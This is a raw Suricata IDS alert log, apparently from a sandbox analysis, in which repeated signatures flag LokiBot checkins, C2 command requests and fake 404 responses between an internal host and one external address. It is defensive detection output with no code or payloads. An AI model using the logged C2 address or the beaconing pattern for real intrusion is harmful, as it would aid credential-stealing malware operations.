Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65130 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65130 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65011 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65130 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65011 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65011 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65124 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65137 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65124 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65142 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65142 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65142 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65129 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65130 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65130 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65137 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65143 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65143 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65137 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65124 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65129 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65143 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65124 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65151 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65151 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65151 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65137 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65137 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65155 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65155 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65155 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65129 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65129 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65011 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65143 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65151 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65148 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65157 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65148 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65143 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65148 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65155 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65155 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65116
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65157 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65011 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65157 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64998
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65160 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65180 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65180 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65180 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65157 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65157 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65180 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65180 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65081
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65183 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65183 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65183 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65154 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65154 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65151 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65154 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65160 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65182 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65160 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65183 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64939 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65031 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65183 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65154 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65154 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65182 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65160 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65139 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65182 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64939 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64939 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65144 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65173 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65160 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65144 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65144 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64939 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64939 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65142 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65129
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65155
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65182 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65144 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65173 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65182 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65143
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65142 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65140 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65140 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65140 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65200 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65200 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65200 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65140 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65140 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65141 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65136 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65141 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65144 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65173 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65178 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65183
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65141 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65178 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65151
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65178 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65136 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65173 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65173 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65110
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65141 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65136 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65208 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65208 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65178 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65141 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65208 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65138 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65138 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65157
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65138 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65208 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65208 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65138 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65138 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65136 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65182
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65160
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65070 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65045 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65070 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65070 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65172 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65148 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65136 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64939
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65070 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65070 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65146 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65206 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65206 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65206 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65158 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65158 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65158 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65200 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65206 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65149 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65149 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65172 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65158 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65130
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65172 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65140
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65172 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65172 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65200 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65135 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65135 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65135 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65209 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65209 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65209 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65139 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65135 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65045 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65135 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65045 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65153 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65209 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65209 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65136
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65045 -> 104.21.64.1:80
